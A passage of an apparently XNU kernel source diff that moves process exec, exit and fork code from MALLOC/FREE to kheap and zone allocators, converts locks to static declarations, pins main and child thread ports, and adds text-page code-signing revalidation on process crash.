-                           (ipc_object_t *) &port, 0, NULL, IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND);
+                           (ipc_object_t *) &port, 0, NULL, IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND);
 
                        if (kr != KERN_SUCCESS) {
                                error = EINVAL;
@@ -2606,13 +2615,27 @@ exec_spawnattr_getmacpolicyinfo(const void *macextensions, const char *policynam
        return NULL;
 }
 
+static void
+spawn_free_macpolicyinfo(const struct user__posix_spawn_args_desc *px_args,
+    _posix_spawn_mac_policy_extensions_t psmx, int count)
+{
+       if (psmx == NULL) {
+               return;
+       }
+       for (int i = 0; i < count; i++) {
+               _ps_mac_policy_extension_t *ext = &psmx->psmx_extensions[i];
+               kheap_free(KHEAP_TEMP, ext->datap, (vm_size_t) ext->datalen);
+       }
+       kheap_free(KHEAP_TEMP, psmx, px_args->mac_extensions_size);
+}
+
 static int
-spawn_copyin_macpolicyinfo(const struct user__posix_spawn_args_desc *px_args, _posix_spawn_mac_policy_extensions_t *psmxp)
+spawn_copyin_macpolicyinfo(const struct user__posix_spawn_args_desc *px_args,
+    _posix_spawn_mac_policy_extensions_t *psmxp)
 {
        _posix_spawn_mac_policy_extensions_t psmx = NULL;
        int error = 0;
        int copycnt = 0;
-       int i = 0;
 
        *psmxp = NULL;
 
@@ -2622,8 +2645,14 @@ spawn_copyin_macpolicyinfo(const struct user__posix_spawn_args_desc *px_args, _p
                goto bad;
        }
 
-       MALLOC(psmx, _posix_spawn_mac_policy_extensions_t, px_args->mac_extensions_size, M_TEMP, M_WAITOK);
-       if ((error = copyin(px_args->mac_extensions, psmx, px_args->mac_extensions_size)) != 0) {
+       psmx = kheap_alloc(KHEAP_TEMP, px_args->mac_extensions_size, Z_WAITOK);
+       if (psmx == NULL) {
+               error = ENOMEM;
+               goto bad;
+       }
+
+       error = copyin(px_args->mac_extensions, psmx, px_args->mac_extensions_size);
+       if (error) {
                goto bad;
        }
 
@@ -2633,7 +2662,7 @@ spawn_copyin_macpolicyinfo(const struct user__posix_spawn_args_desc *px_args, _p
                goto bad;
        }
 
-       for (i = 0; i < psmx->psmx_count; i++) {
+       for (int i = 0; i < psmx->psmx_count; i++) {
                _ps_mac_policy_extension_t *extension = &psmx->psmx_extensions[i];
                if (extension->datalen == 0 || extension->datalen > PAGE_SIZE) {
                        error = EINVAL;
@@ -2650,9 +2679,15 @@ spawn_copyin_macpolicyinfo(const struct user__posix_spawn_args_desc *px_args, _p
                        goto bad;
                }
 #endif
-               MALLOC(data, void *, (size_t)extension->datalen, M_TEMP, M_WAITOK);
-               if ((error = copyin((user_addr_t)extension->data, data, (size_t)extension->datalen)) != 0) {
-                       FREE(data, M_TEMP);
+               data = kheap_alloc(KHEAP_TEMP, (vm_size_t) extension->datalen, Z_WAITOK);
+               if (data == NULL) {
+                       error = ENOMEM;
+                       goto bad;
+               }
+               error = copyin((user_addr_t)extension->data, data, (size_t)extension->datalen);
+               if (error) {
+                       kheap_free(KHEAP_TEMP, data, (vm_size_t) extension->datalen);
+                       error = ENOMEM;
                        goto bad;
                }
                extension->datap = data;
@@ -2662,28 +2697,9 @@ spawn_copyin_macpolicyinfo(const struct user__posix_spawn_args_desc *px_args, _p
        return 0;
 
 bad:
-       if (psmx != NULL) {
-               for (i = 0; i < copycnt; i++) {
-                       FREE(psmx->psmx_extensions[i].datap, M_TEMP);
-               }
-               FREE(psmx, M_TEMP);
-       }
+       spawn_free_macpolicyinfo(px_args, psmx, copycnt);
        return error;
 }
-
-static void
-spawn_free_macpolicyinfo(_posix_spawn_mac_policy_extensions_t psmx)
-{
-       int i;
-
-       if (psmx == NULL) {
-               return;
-       }
-       for (i = 0; i < psmx->psmx_count; i++) {
-               FREE(psmx->psmx_extensions[i].datap, M_TEMP);
-       }
-       FREE(psmx, M_TEMP);
-}
 #endif /* CONFIG_MACF */
 
 #if CONFIG_COALITIONS
@@ -3064,7 +3080,8 @@ posix_spawn(proc_t ap, struct posix_spawn_args *uap, int32_t *retval)
         * Allocate a big chunk for locals instead of using stack since these
         * structures are pretty big.
         */
-       MALLOC(bufp, char *, (sizeof(*imgp) + sizeof(*vap) + sizeof(*origvap)), M_TEMP, M_WAITOK | M_ZERO);
+       bufp = kheap_alloc(KHEAP_TEMP,
+           sizeof(*imgp) + sizeof(*vap) + sizeof(*origvap), Z_WAITOK | Z_ZERO);
        imgp = (struct image_params *) bufp;
        if (bufp == NULL) {
                error = ENOMEM;
@@ -3148,7 +3165,9 @@ posix_spawn(proc_t ap, struct posix_spawn_args *uap, int32_t *retval)
                                error = EINVAL;
                                goto bad;
                        }
-                       MALLOC(px_sfap, _posix_spawn_file_actions_t, px_args.file_actions_size, M_TEMP, M_WAITOK);
+
+                       px_sfap = kheap_alloc(KHEAP_TEMP,
+                           px_args.file_actions_size, Z_WAITOK);
                        if (px_sfap == NULL) {
                                error = ENOMEM;
                                goto bad;
@@ -3175,8 +3194,8 @@ posix_spawn(proc_t ap, struct posix_spawn_args *uap, int32_t *retval)
                                goto bad;
                        }
 
-                       MALLOC(px_spap, _posix_spawn_port_actions_t,
-                           px_args.port_actions_size, M_TEMP, M_WAITOK);
+                       px_spap = kheap_alloc(KHEAP_TEMP,
+                           px_args.port_actions_size, Z_WAITOK);
                        if (px_spap == NULL) {
                                error = ENOMEM;
                                goto bad;
@@ -3204,7 +3223,8 @@ posix_spawn(proc_t ap, struct posix_spawn_args *uap, int32_t *retval)
                                goto bad;
                        }
 
-                       MALLOC(px_persona, struct _posix_spawn_persona_info *, px_args.persona_info_size, M_TEMP, M_WAITOK | M_ZERO);
+                       px_persona = kheap_alloc(KHEAP_TEMP,
+                           px_args.persona_info_size, Z_WAITOK);
                        if (px_persona == NULL) {
                                error = ENOMEM;
                                goto bad;
@@ -3233,8 +3253,8 @@ posix_spawn(proc_t ap, struct posix_spawn_args *uap, int32_t *retval)
                                goto bad;
                        }
 
-                       MALLOC(px_pcred_info, struct _posix_spawn_posix_cred_info *,
-                           px_args.posix_cred_info_size, M_TEMP, M_WAITOK | M_ZERO);
+                       px_pcred_info = kheap_alloc(KHEAP_TEMP,
+                           px_args.posix_cred_info_size, Z_WAITOK);
                        if (px_pcred_info == NULL) {
                                error = ENOMEM;
                                goto bad;
@@ -3270,7 +3290,7 @@ posix_spawn(proc_t ap, struct posix_spawn_args *uap, int32_t *retval)
                                 * ...AND the parent has the entitlement, copy
                                 * the subsystem root path in.
                                 */
-                               MALLOC(subsystem_root_path, char *, px_args.subsystem_root_path_size, M_SBUF, M_WAITOK | M_ZERO | M_NULL);
+                               subsystem_root_path = zalloc_flags(ZV_NAMEI, Z_WAITOK | Z_ZERO);
 
                                if (subsystem_root_path == NULL) {
                                        error = ENOMEM;
@@ -4088,27 +4108,25 @@ bad:
                if (imgp->ip_strings) {
                        execargs_free(imgp);
                }
-               if (imgp->ip_px_sfa != NULL) {
-                       FREE(imgp->ip_px_sfa, M_TEMP);
-               }
-               if (imgp->ip_px_spa != NULL) {
-                       FREE(imgp->ip_px_spa, M_TEMP);
-               }
+               kheap_free(KHEAP_TEMP, imgp->ip_px_sfa,
+                   px_args.file_actions_size);
+               kheap_free(KHEAP_TEMP, imgp->ip_px_spa,
+                   px_args.port_actions_size);
 #if CONFIG_PERSONAS
-               if (imgp->ip_px_persona != NULL) {
-                       FREE(imgp->ip_px_persona, M_TEMP);
-               }
+               kheap_free(KHEAP_TEMP, imgp->ip_px_persona,
+                   px_args.persona_info_size);
 #endif
-               if (imgp->ip_px_pcred_info != NULL) {
-                       FREE(imgp->ip_px_pcred_info, M_TEMP);
-               }
+               kheap_free(KHEAP_TEMP, imgp->ip_px_pcred_info,
+                   px_args.posix_cred_info_size);
 
                if (subsystem_root_path != NULL) {
-                       FREE(subsystem_root_path, M_SBUF);
+                       zfree(ZV_NAMEI, subsystem_root_path);
                }
 #if CONFIG_MACF
-               if (imgp->ip_px_smpx != NULL) {
-                       spawn_free_macpolicyinfo(imgp->ip_px_smpx);
+               _posix_spawn_mac_policy_extensions_t psmx = imgp->ip_px_smpx;
+               if (psmx) {
+                       spawn_free_macpolicyinfo(&px_args,
+                           psmx, psmx->psmx_count);
                }
                if (imgp->ip_execlabelp) {
                        mac_cred_label_free(imgp->ip_execlabelp);
@@ -4263,9 +4281,8 @@ bad:
                proc_rele(p);
        }
 
-       if (bufp != NULL) {
-               FREE(bufp, M_TEMP);
-       }
+       kheap_free(KHEAP_TEMP, bufp,
+           sizeof(*imgp) + sizeof(*vap) + sizeof(*origvap));
 
        if (inherit != NULL) {
                ipc_importance_release(inherit);
@@ -4506,7 +4523,8 @@ __mac_execve(proc_t p, struct __mac_execve_args *uap, int32_t *retval)
        /* Allocate a big chunk for locals instead of using stack since these
         * structures a pretty big.
         */
-       MALLOC(bufp, char *, (sizeof(*imgp) + sizeof(*vap) + sizeof(*origvap)), M_TEMP, M_WAITOK | M_ZERO);
+       bufp = kheap_alloc(KHEAP_TEMP,
+           sizeof(*imgp) + sizeof(*vap) + sizeof(*origvap), Z_WAITOK | Z_ZERO);
        imgp = (struct image_params *) bufp;
        if (bufp == NULL) {
                error = ENOMEM;
@@ -4794,9 +4812,8 @@ exit_with_error:
                proc_rele(p);
        }
 
-       if (bufp != NULL) {
-               FREE(bufp, M_TEMP);
-       }
+       kheap_free(KHEAP_TEMP, bufp,
+           sizeof(*imgp) + sizeof(*vap) + sizeof(*origvap));
 
        if (inherit != NULL) {
                ipc_importance_release(inherit);
@@ -5396,10 +5413,12 @@ extern uuid_string_t bootsessionuuid_string;
 #define PTRAUTH_DISABLED_FLAG "ptrauth_disabled=1"
 #define DYLD_ARM64E_ABI_KEY "arm64e_abi="
 #endif /* __has_feature(ptrauth_calls) */
+#define MAIN_TH_PORT_KEY "th_port="
 
 #define FSID_MAX_STRING "0x1234567890abcdef,0x1234567890abcdef"
 
 #define HEX_STR_LEN 18 // 64-bit hex value "0x0123456701234567"
+#define HEX_STR_LEN32 10 // 32-bit hex value "0x01234567"
 
 static int
 exec_add_entropy_key(struct image_params *imgp,
@@ -5453,6 +5472,8 @@ exec_add_apple_strings(struct image_params *imgp,
 {
        int error;
        int img_ptr_size = (imgp->ip_flags & IMGPF_IS_64BIT_ADDR) ? 8 : 4;
+       thread_t new_thread;
+       ipc_port_t sright;
 
        /* exec_save_path stored the first string */
        imgp->ip_applec = 1;
@@ -5658,6 +5679,26 @@ exec_add_apple_strings(struct image_params *imgp,
                imgp->ip_applec++;
        }
 #endif
+       /*
+        * Add main thread mach port name
+        * +1 uref on main thread port, this ref will be extracted by libpthread in __pthread_init
+        * and consumed in _bsdthread_terminate. Leaking the main thread port name if not linked
+        * against libpthread.
+        */
+       if ((new_thread = imgp->ip_new_thread) != THREAD_NULL) {
+               thread_reference(new_thread);
+               sright = convert_thread_to_port_pinned(new_thread);
+               task_t new_task = get_threadtask(new_thread);
+               mach_port_name_t name = ipc_port_copyout_send(sright, get_task_ipcspace(new_task));
+               char port_name_hex_str[strlen(MAIN_TH_PORT_KEY) + HEX_STR_LEN32 + 1];
+               snprintf(port_name_hex_str, sizeof(port_name_hex_str), MAIN_TH_PORT_KEY "0x%x", name);
+
+               error = exec_add_user_string(imgp, CAST_USER_ADDR_T(port_name_hex_str), UIO_SYSSPACE, FALSE);
+               if (error) {
+                       goto bad;
+               }
+               imgp->ip_applec++;
+       }
 
        /* Align the tail of the combined applev area */
        while (imgp->ip_strspace % img_ptr_size != 0) {
@@ -6053,7 +6094,8 @@ handle_mac_transition:
                                        continue;
                                }
 
-                               MALLOC(ndp, struct nameidata *, sizeof(*ndp), M_TEMP, M_WAITOK | M_ZERO);
+                               ndp = kheap_alloc(KHEAP_TEMP,
+                                   sizeof(*ndp), Z_WAITOK | Z_ZERO);
                                if (ndp == NULL) {
                                        fp_free(p, indx, fp);
                                        error = ENOMEM;
@@ -6066,7 +6108,7 @@ handle_mac_transition:
 
                                if ((error = vn_open(ndp, flag, 0)) != 0) {
                                        fp_free(p, indx, fp);
-                                       FREE(ndp, M_TEMP);
+                                       kheap_free(KHEAP_TEMP, ndp, sizeof(*ndp));
                                        break;
                                }
 
@@ -6083,7 +6125,7 @@ handle_mac_transition:
                                fp_drop(p, indx, fp, 1);
                                proc_fdunlock(p);
 
-                               FREE(ndp, M_TEMP);
+                               kheap_free(KHEAP_TEMP, ndp, sizeof(*ndp));
                        }
                }
        }
@@ -6537,24 +6579,24 @@ load_return_to_errno(load_return_t lrtn)
 
 
 static int execargs_waiters = 0;
-lck_mtx_t *execargs_cache_lock;
+static LCK_MTX_DECLARE_ATTR(execargs_cache_lock, &proc_lck_grp, &proc_lck_attr);
 
 static void
 execargs_lock_lock(void)
 {
-       lck_mtx_lock_spin(execargs_cache_lock);
+       lck_mtx_lock_spin(&execargs_cache_lock);
 }
 
 static void
 execargs_lock_unlock(void)
 {
-       lck_mtx_unlock(execargs_cache_lock);
+       lck_mtx_unlock(&execargs_cache_lock);
 }
 
 static wait_result_t
 execargs_lock_sleep(void)
 {
-       return lck_mtx_sleep(execargs_cache_lock, LCK_SLEEP_DEFAULT, &execargs_free_count, THREAD_INTERRUPTIBLE);
+       return lck_mtx_sleep(&execargs_cache_lock, LCK_SLEEP_DEFAULT, &execargs_free_count, THREAD_INTERRUPTIBLE);
 }
 
 static kern_return_t
index c38e6a898048958db26776e01fa875d69314eeb0..e9dc75475b31068fdf2c89e86915f3e62d3c92c4 100644 (file)
 #include <kern/assert.h>
 #include <kern/policy_internal.h>
 #include <kern/exc_guard.h>
+#include <kern/backtrace.h>
 
 #include <vm/vm_protos.h>
 #include <os/log.h>
@@ -935,8 +936,7 @@ exit_with_reason(proc_t p, int rv, int *retval, boolean_t thread_can_terminate,
                os_reason_free(exit_reason);
                if (current_proc() == p) {
                        if (p->exit_thread == self) {
-                               printf("exit_thread failed to exit, leaving process %s[%d] in unkillable limbo\n",
-                                   p->p_comm, p->p_pid);
+                               panic("exit_thread failed to exit");
                        }
 
                        if (thread_can_terminate) {
@@ -1004,10 +1004,10 @@ exit_with_reason(proc_t p, int rv, int *retval, boolean_t thread_can_terminate,
 static void
 proc_memorystatus_remove(proc_t p)
 {
-       LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED);
+       LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED);
        while (memorystatus_remove(p) == EAGAIN) {
                os_log(OS_LOG_DEFAULT, "memorystatus_remove: Process[%d] tried to exit while being frozen. Blocking exit until freeze completes.", p->p_pid);
-               msleep(&p->p_memstat_state, proc_list_mlock, PWAIT, "proc_memorystatus_remove", NULL);
+               msleep(&p->p_memstat_state, &proc_list_mlock, PWAIT, "proc_memorystatus_remove", NULL);
        }
 }
 #endif
@@ -1069,6 +1069,58 @@ proc_prepareexit(proc_t p, int rv, boolean_t perf_notify)
                if (kr != 0) {
                        create_corpse = TRUE;
                }
+
+               /*
+                * Revalidate the code signing of the text pages around current PC.
+                * This is an attempt to detect and repair faults due to memory
+                * corruption of text pages.
+                *
+                * The goal here is to fixup infrequent memory corruptions due to
+                * things like aging RAM bit flips. So the approach is to only expect
+                * to have to fixup one thing per crash. This also limits the amount
+                * of extra work we cause in case this is a development kernel with an
+                * active memory stomp happening.
+                */
+               task_t task = proc_task(p);
+               uintptr_t bt[2];
+               int bt_err;
+               bool user64;
+               bool was_truncated;
+               unsigned int frame_count = backtrace_user(bt, 2, &bt_err, &user64, &was_truncated);
+
+               if (bt_err == 0 && frame_count >= 1) {
+                       /*
+                        * First check at the page containing the current PC.
+                        * This passes if the page code signs -or- if we can't figure out
+                        * what is at that address. The latter action is so we continue checking
+                        * previous pages which may be corrupt and caused a wild branch.
+                        */
+                       kr = revalidate_text_page(task, bt[0]);
+
+                       /* No corruption found, check the previous sequential page */
+                       if (kr == KERN_SUCCESS) {
+                               kr = revalidate_text_page(task, bt[0] - get_task_page_size(task));
+                       }
+
+                       /* Still no corruption found, check the current function's caller */
+                       if (kr == KERN_SUCCESS) {
+                               if (frame_count > 1 &&
+                                   atop(bt[0]) != atop(bt[1]) &&           /* don't recheck PC page */
+                                   atop(bt[0]) - 1 != atop(bt[1])) {       /* don't recheck page before */
+                                       kr = revalidate_text_page(task, (vm_map_offset_t)bt[1]);
+                               }
+                       }
+
+                       /*
+                        * Log that we found a corruption.
+                        * TBD..figure out how to bubble this up to crash reporter too,
+                        * instead of just the log message.
+                        */
+                       if (kr != KERN_SUCCESS) {
+                               os_log(OS_LOG_DEFAULT,
+                                   "Text page corruption detected in dying process %d\n", p->p_pid);
+                       }
+               }
        }
 
 skipcheck:
@@ -1389,7 +1441,7 @@ proc_exit(proc_t p)
                        }
                        /* check for sysctl zomb lookup */
                        while ((q->p_listflag & P_LIST_WAITING) == P_LIST_WAITING) {
-                               msleep(&q->p_stat, proc_list_mlock, PWAIT, "waitcoll", 0);
+                               msleep(&q->p_stat, &proc_list_mlock, PWAIT, "waitcoll", 0);
                        }
                        q->p_listflag |= P_LIST_WAITING;
                        /*
@@ -1630,7 +1682,7 @@ proc_exit(proc_t p)
                    pid, exitval, 0, 0, 0);
                /* check for sysctl zomb lookup */
                while ((p->p_listflag & P_LIST_WAITING) == P_LIST_WAITING) {
-                       msleep(&p->p_stat, proc_list_mlock, PWAIT, "waitcoll", 0);
+                       msleep(&p->p_stat, &proc_list_mlock, PWAIT, "waitcoll", 0);
                }
                /* safe to use p as this is a system reap */
                p->p_stat = SZOMB;
@@ -1843,13 +1895,14 @@ reap_child_locked(proc_t parent, proc_t child, int deadparent, int reparentedtoi
                child->p_ucred = NOCRED;
        }
 
-       lck_mtx_destroy(&child->p_mlock, proc_mlock_grp);
-       lck_mtx_destroy(&child->p_ucred_mlock, proc_ucred_mlock_grp);
-       lck_mtx_destroy(&child->p_fdmlock, proc_fdmlock_grp);
+       lck_mtx_destroy(&child->p_mlock, &proc_mlock_grp);
+       lck_mtx_destroy(&child->p_ucred_mlock, &proc_ucred_mlock_grp);
+       lck_mtx_destroy(&child->p_fdmlock, &proc_fdmlock_grp);
 #if CONFIG_DTRACE
-       lck_mtx_destroy(&child->p_dtrace_sprlock, proc_lck_grp);
+       lck_mtx_destroy(&child->p_dtrace_sprlock, &proc_lck_grp);
 #endif
-       lck_spin_destroy(&child->p_slock, proc_slock_grp);
+       lck_spin_destroy(&child->p_slock, &proc_slock_grp);
+       lck_rw_destroy(&child->p_dirs_lock, &proc_dirslock_grp);
 
        zfree(proc_zone, child);
        if ((locked == 1) && (droplock == 0)) {
@@ -1935,7 +1988,7 @@ loop1:
                        wait4_data->args = uap;
                        thread_set_pending_block_hint(current_thread(), kThreadWaitOnProcess);
 
-                       (void)msleep(&p->p_stat, proc_list_mlock, PWAIT, "waitcoll", 0);
+                       (void)msleep(&p->p_stat, &proc_list_mlock, PWAIT, "waitcoll", 0);
                        goto loop1;
                }
                p->p_listflag |= P_LIST_WAITING;   /* only allow single thread to wait() */
@@ -2080,7 +2133,7 @@ loop1:
        wait4_data->retval = retval;
 
        thread_set_pending_block_hint(current_thread(), kThreadWaitOnProcess);
-       if ((error = msleep0((caddr_t)q, proc_list_mlock, PWAIT | PCATCH | PDROP, "wait", 0, wait1continue))) {
+       if ((error = msleep0((caddr_t)q, &proc_list_mlock, PWAIT | PCATCH | PDROP, "wait", 0, wait1continue))) {
                return error;
        }
 
@@ -2199,7 +2252,7 @@ loop1:
                 * the single return for waited process guarantee.
                 */
                if (p->p_listflag & P_LIST_WAITING) {
-                       (void) msleep(&p->p_stat, proc_list_mlock,
+                       (void) msleep(&p->p_stat, &proc_list_mlock,
                            PWAIT, "waitidcoll", 0);
                        goto loop1;
                }
@@ -2327,14 +2380,14 @@ loop1:
                        }
                        goto out;
                }
-               ASSERT_LCK_MTX_OWNED(proc_list_mlock);
+               ASSERT_LCK_MTX_OWNED(&proc_list_mlock);
 
                /* Not a process we are interested in; go on to next child */
 
                p->p_listflag &= ~P_LIST_WAITING;
                wakeup(&p->p_stat);
        }
-       ASSERT_LCK_MTX_OWNED(proc_list_mlock);
+       ASSERT_LCK_MTX_OWNED(&proc_list_mlock);
 
        /* No child processes that could possibly satisfy the request? */
 
@@ -2368,7 +2421,7 @@ loop1:
        waitid_data->args = uap;
        waitid_data->retval = retval;
 
-       if ((error = msleep0(q, proc_list_mlock,
+       if ((error = msleep0(q, &proc_list_mlock,
            PWAIT | PCATCH | PDROP, "waitid", 0, waitidcontinue)) != 0) {
                return error;
        }
@@ -2562,7 +2615,7 @@ vfork_exit_internal(proc_t p, int rv, int forceexit)
                        }
                        /* check for lookups by zomb sysctl */
                        while ((q->p_listflag & P_LIST_WAITING) == P_LIST_WAITING) {
-                               msleep(&q->p_stat, proc_list_mlock, PWAIT, "waitcoll", 0);
+                               msleep(&q->p_stat, &proc_list_mlock, PWAIT, "waitcoll", 0);
                        }
                        q->p_listflag |= P_LIST_WAITING;
                        /*
@@ -2725,8 +2778,9 @@ vfork_exit_internal(proc_t p, int rv, int forceexit)
        zfree(proc_sigacts_zone, p->p_sigacts);
        p->p_sigacts = NULL;
 
-       FREE(p->p_subsystem_root_path, M_SBUF);
-       p->p_subsystem_root_path = NULL;
+       if (p->p_subsystem_root_path) {
+               zfree(ZV_NAMEI, p->p_subsystem_root_path);
+       }
 
        proc_limitdrop(p);
 
@@ -2775,7 +2829,7 @@ vfork_exit_internal(proc_t p, int rv, int forceexit)
                proc_list_lock();
                /* check for lookups by zomb sysctl */
                while ((p->p_listflag & P_LIST_WAITING) == P_LIST_WAITING) {
-                       msleep(&p->p_stat, proc_list_mlock, PWAIT, "waitcoll", 0);
+                       msleep(&p->p_stat, &proc_list_mlock, PWAIT, "waitcoll", 0);
                }
                p->p_stat = SZOMB;
                p->p_listflag |= P_LIST_WAITING;
index b9475aed173be24b21325010f7b4aa4be632270c..e48cffe6d0d0bade3c25c4d0d28fb14b1a4e0686 100644 (file)
@@ -841,12 +841,13 @@ fork_create_child(task_t parent_task,
        }
 
        /*
-        * Create a new thread for the child process
+        * Create a new thread for the child process. Pin it and make it immovable.
         * The new thread is waiting on the event triggered by 'task_clear_return_wait'
         */
        result = thread_create_waiting(child_task,
            (thread_continue_t)task_wait_to_return,
            task_get_return_wait_event(child_task),
+           TH_CREATE_WAITING_OPTION_PINNED | TH_CREATE_WAITING_OPTION_IMMOVABLE,
            &child_thread);
 
        if (result != KERN_SUCCESS) {
@@ -1124,13 +1125,14 @@ forkproc_free(proc_t p)
        /* Update the audit session proc count */
        AUDIT_SESSION_PROCEXIT(p);
 
-       lck_mtx_destroy(&p->p_mlock, proc_mlock_grp);
-       lck_mtx_destroy(&p->p_fdmlock, proc_fdmlock_grp);
-       lck_mtx_destroy(&p->p_ucred_mlock, proc_ucred_mlock_grp);
+       lck_mtx_destroy(&p->p_mlock, &proc_mlock_grp);
+       lck_mtx_destroy(&p->p_fdmlock, &proc_fdmlock_grp);
+       lck_mtx_destroy(&p->p_ucred_mlock, &proc_ucred_mlock_grp);
 #if CONFIG_DTRACE
-       lck_mtx_destroy(&p->p_dtrace_sprlock, proc_lck_grp);
+       lck_mtx_destroy(&p->p_dtrace_sprlock, &proc_lck_grp);
 #endif
-       lck_spin_destroy(&p->p_slock, proc_slock_grp);
+       lck_spin_destroy(&p->p_slock, &proc_slock_grp);
+       lck_rw_destroy(&p->p_dirs_lock, &proc_dirslock_grp);
 
        /* Release the credential reference */
        kauth_cred_t tmp_ucred = p->p_ucred;
@@ -1153,8 +1155,9 @@ forkproc_free(proc_t p)
        p->p_sigacts = NULL;
        zfree(proc_stats_zone, p->p_stats);
        p->p_stats = NULL;
-       FREE(p->p_subsystem_root_path, M_SBUF);
-       p->p_subsystem_root_path = NULL;
+       if (p->p_subsystem_root_path) {
+               zfree(ZV_NAMEI, p->p_subsystem_root_path);
+       }
 
        proc_checkdeadrefs(p);
        zfree(proc_zone, p);
@@ -1317,13 +1320,14 @@ retry:
        /* update audit session proc count */
        AUDIT_SESSION_PROCNEW(child_proc);
 
-       lck_mtx_init(&child_proc->p_mlock, proc_mlock_grp, proc_lck_attr);
-       lck_mtx_init(&child_proc->p_fdmlock, proc_fdmlock_grp, proc_lck_attr);
-       lck_mtx_init(&child_proc->p_ucred_mlock, proc_ucred_mlock_grp, proc_lck_attr);
+       lck_mtx_init(&child_proc->p_mlock, &proc_mlock_grp, &proc_lck_attr);
+       lck_mtx_init(&child_proc->p_fdmlock, &proc_fdmlock_grp, &proc_lck_attr);
+       lck_mtx_init(&child_proc->p_ucred_mlock, &proc_ucred_mlock_grp, &proc_lck_attr);
 #if CONFIG_DTRACE
-       lck_mtx_init(&child_proc->p_dtrace_sprlock, proc_lck_grp, proc_lck_attr);
+       lck_mtx_init(&child_proc->p_dtrace_sprlock, &proc_lck_grp, &proc_lck_attr);
 #endif
-       lck_spin_init(&child_proc->p_slock, proc_slock_grp, proc_lck_attr);
+       lck_spin_init(&child_proc->p_slock, &proc_slock_grp, &proc_lck_attr);
+       lck_rw_init(&child_proc->p_dirs_lock, &proc_dirslock_grp, &proc_lck_attr);
 
        klist_init(&child_proc->p_klist);
 
@@ -1348,7 +1352,6 @@ retry:
         *
         * XXX may fail to copy descriptors to child
         */
-       lck_rw_init(&child_proc->p_dirs_lock, proc_dirslock_grp, proc_lck_attr);
        child_proc->p_fd = fdcopy(parent_proc, parent_uthread->uu_cdir);
 
 #if SYSV_SHM
@@ -1462,7 +1465,9 @@ retry:
 
        if (parent_proc->p_subsystem_root_path) {
                size_t parent_length = strlen(parent_proc->p_subsystem_root_path) + 1;
-               MALLOC(child_proc->p_subsystem_root_path, char *, parent_length, M_SBUF, M_WAITOK | M_ZERO);
+               assert(parent_length <= MAXPATHLEN);
+               child_proc->p_subsystem_root_path = zalloc_flags(ZV_NAMEI,
+                   Z_WAITOK | Z_ZERO);
                memcpy(child_proc->p_subsystem_root_path, parent_proc->p_subsystem_root_path, parent_length);
        }
 
@@ -1473,7 +1478,7 @@ bad:
 void
 proc_lock(proc_t p)
 {
-       LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED);
+       LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED);
        lck_mtx_lock(&p->p_mlock);
 }
 
@@ -1486,7 +1491,7 @@ proc_unlock(proc_t p)
 void
 proc_spinlock(proc_t p)
 {
-       lck_spin_lock_grp(&p->p_slock, proc_slock_grp);
+       lck_spin_lock_grp(&p->p_slock, &proc_slock_grp);
 }
 
 void
@@ -1498,13 +1503,13 @@ proc_spinunlock(proc_t p)
 void
 proc_list_lock(void)
 {
-       lck_mtx_lock(proc_list_mlock);
+       lck_mtx_lock(&proc_list_mlock);
 }
 
 void
 proc_list_unlock(void)
 {
-       lck_mtx_unlock(proc_list_mlock);
+       lck_mtx_unlock(&proc_list_mlock);
 }
 
 void
@@ -1634,7 +1639,6 @@ uthread_cleanup_name(void *uthread)
 void
 uthread_cleanup(task_t task, void *uthread, void * bsd_info)
 {
-       struct _select *sel;
        uthread_t uth = (uthread_t)uthread;
        proc_t p = (proc_t)bsd_info;
 
@@ -1669,12 +1673,8 @@ uthread_cleanup(task_t task, void *uthread, void * bsd_info)
                kqueue_threadreq_unbind(p, uth->uu_kqr_bound);
        }
 
-       sel = &uth->uu_select;
-       /* cleanup the select bit space */
-       if (sel->nbytes) {
-               FREE(sel->ibits, M_TEMP);
-               FREE(sel->obits, M_TEMP);
-               sel->nbytes = 0;
+       if (uth->uu_select.nbytes) {
+               select_cleanup_uthread(&uth->uu_select);
        }
 
        if (uth->uu_cdir) {
@@ -1686,7 +1686,7 @@ uthread_cleanup(task_t task, void *uthread, void * bsd_info)
                if (waitq_set_is_valid(uth->uu_wqset)) {
                        waitq_set_deinit(uth->uu_wqset);
                }
-               FREE(uth->uu_wqset, M_SELECT);
+               kheap_free(KHEAP_DEFAULT, uth->uu_wqset, uth->uu_wqstate_sz);
                uth->uu_wqset = NULL;
                uth->uu_wqstate_sz = 0;
        }
index 6827a927fad9b69e3fdc6032e7d5cd21fa946c0b..8fc2889fd579ca7623c44c7e323c6476e84b3381 100644 (file)
@@ -1006,8 +1006,8 @@ free_vgo(struct vng_owner *vgo)
 }
 
 static int label_slot;
-static lck_rw_t llock;
-static lck_grp_t *llock_grp;
+static LCK_GRP_DECLARE(llock_grp, VNG_POLICY_NAME);
+static LCK_RW_DECLARE(llock, &llock_grp);
 
 static __inline void *
 vng_lbl_get(struct label *label)
@@ -1413,7 +1413,9 @@ vng_guard_violation(const struct vng_info *vgi,
                if (vng_policy_flags & kVNG_POLICY_EXC_CORPSE) {
                        char *path;
                        int len = MAXPATHLEN;
-                       MALLOC(path, char *, len, M_TEMP, M_WAITOK);
+
+                       path = zalloc(ZV_NAMEI);
+
                        os_reason_t r = NULL;
                        if (NULL != path) {
                                vn_getpath(vp, path, &len);
@@ -1425,9 +1427,8 @@ vng_guard_violation(const struct vng_info *vgi,
                        if (NULL != r) {
                                os_reason_free(r);
                        }
-                       if (NULL != path) {
-                               FREE(path, M_TEMP);
-                       }
+
+                       zfree(ZV_NAMEI, path);
                } else {
                        thread_t t = current_thread();
                        thread_guard_violation(t, code, subcode, TRUE);
@@ -1623,13 +1624,6 @@ vng_vnode_check_open(kauth_cred_t cred,
  * Configuration gorp
  */
 
-static void
-vng_init(struct mac_policy_conf *mpc)
-{
-       llock_grp = lck_grp_alloc_init(mpc->mpc_name, LCK_GRP_ATTR_NULL);
-       lck_rw_init(&llock, llock_grp, LCK_ATTR_NULL);
-}
-
 SECURITY_READ_ONLY_EARLY(static struct mac_policy_ops) vng_policy_ops = {
        .mpo_file_label_destroy = vng_file_label_destroy,
 
